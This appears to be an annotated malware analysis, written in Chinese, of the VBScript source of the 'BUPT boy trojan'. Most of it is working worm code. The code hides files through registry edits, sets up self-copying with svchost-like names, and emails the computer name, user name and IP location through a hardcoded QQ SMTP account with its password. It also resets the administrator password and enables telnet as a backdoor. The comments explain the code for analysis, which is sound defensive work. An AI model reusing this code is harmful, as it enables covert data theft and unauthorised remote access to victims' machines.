“北邮男生木马”代码全诠释
“北邮男生木马”代码全注释
- VBScript code
'
'1.主体函数部分
'
'当运行脚本时,主体函数部分代码依次执行
'所以分析脚本“主体函数部分”可以看出脚本程序执行思路
On Error Resume Next
'创建文件系统对象,用于文件操作
Set fso = CreateObject("Scripting.FileSystemObject")
'创建Shell对象
Set WshShell = CreateObject("WScript.Shell")
'创建NetWork对象
Set WshNetWork = WScript.CreateObject("Wscript.NetWork")
'脚本的全路径名,如J:\Butp.dat
ThisPath = WScript.ScriptFullName
'1 for system folder.通常返回值是C:\Windows\System32
SysDir = fso.GetSpecialFolder(1) & "\"
'从SysDir从截取Windows目录,如C:\Windows\System32截取后为C:\Windows\
WinDir = Left(SysDir, 11)
SvcHost = "svchost.exe"
FnSys = "svchost.dat"
FnSysExe = "scs.exe"
FnMail = "liam.dat"
FnuTray = "bupt.dat"
FnuTrayExe = "scs"
'Copy脚本的副本
Set file = fso.OpenTextFile(ThisPath, 1) '1 for readonly
VBScriptCopy = file.ReadAll
file.Close
Set file = Nothing
IF LCase(SysDir) = LCase(Left(ThisPath, Len(SysDir))) Then
'如果脚本文件位于系统目录(system32)下
Call SendMail
Call SetupBD
Call ListEnuTray
Else
'不显示隐藏文件
WshShell.RegWrite "HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\showsuperhidden", 0, "Reg_DOWRD"
WshShell.RegWrite "HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\superhidden", 1, "Reg_DOWRD"
WshShell.Run(Left(ThisPath, 2)) '2,最小化窗口
IF Not fso.FileExists(SysDir & FnSys) or Not fso.FileExists(SysDir & FnSysExe) or Not fso.FileExists(WinDir & SvcHost) Then
Call InfectSys
End IF
End IF
'脚本“主体函数部分”结束
'
'2.功能函数部分
'
'“功能函数部分”的代码不会自动执行,除非“主体函数部分”调用到它
'要分析“功能函数部分”需要根据其“主体函数部分”上下文。
'2.1发送Email.
Sub SendMail
On Error Resume Next
'获取本机ip,并根据(小偷程序原理,网上用的较多)ip获取ip所在地理位置
'然后把信息打包
ComputerName = "计算机名:" & WshNetWork.ComputerName
UserName = "当前用户名:" & WshShell.ExpandEnvironmentStrings("%UserName%")
Url = "http://www.ip138.cn" '注意,这个是ip地址查询的网站
Html = GetHttpPage(Url)
PlaceBegin = Instr(1, Html, "你当前的IP为")
PlaceEnd = Instr(PlaceBegin, Html, VBCRLF)
Place = mid(Html, PlaceBegin, PlaceEnd - PlaceBegin)
Msg = ComputerName & "," & UserName & "," & Place
Title = GetIp(".")
'将发送信息打包存放在system32\liam.dat中,目的是防止重复发送email
'注,如果你的电脑已经中招,使用记事本打开liam.dat可以看到你自己系统的信息
IF fso.FileExists(SysDir & FnMail) Then
Set file = fso.OpenTextFile(SysDir & FnMail, 1)
OldMsg = file.ReadAll
file.Close
Set file = Nothing
IF OldMsg = Msg Then
Exit Sub
End IF
End IF
Call WriteFile(SysDir & FnMail, Msg)
'使用cdo发送邮件,邮件内容就是上面搜集信息的打包
'此处使用的是qq邮箱,采用的是自己发送到自己的方式(shader.butp@qq.com)
'我曾经使用qq查找过shader.bupt@qq.com这个账号,因为不是主显账号,查不到
NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
Set EMail = CreateObject("Cdo.Message")
EMail.From = "shader.bupt@qq.com"
EMail.To = "shader.bupt@qq.com"
EMail.Subject = Title
EMail.TextBody = Msg & "," & Now
With EMail.Configuration.Fields
.Item(NameSpace & "SendUsing") = 2
.Item(NameSpace & "SmtpServer") = "smtp.qq.com"
.Item(NameSpace & "SmtpServerPort") = 25
.Item(NameSpace & "SmtpAuthenticate") = 1
.Item(NameSpace & "SendUserName") = "shader.bupt"
.Item(NameSpace & "SendPassword") = "52162"
.UpDate
End With
EMail.Send
End Sub
'2.2在目标电脑上植入信息
Sub SetupBD
On Error Resume Next
IF LCase(WshNetWork.UserName) <> "administrator" Then
'设置管理员密码
Set objUser = GetObject("WinNT://./administrator, user")
objUser.SetPassword "52162"
objUser.SetInfo
'添加自启动服务
WshShell.RegWrite "HKLM\System\Controlset001\services\tlntsvr\start", 2, "REG_DWORD"
End IF
End Sub
'输入限制,只能输入10000字符
'“功能函数部分”结束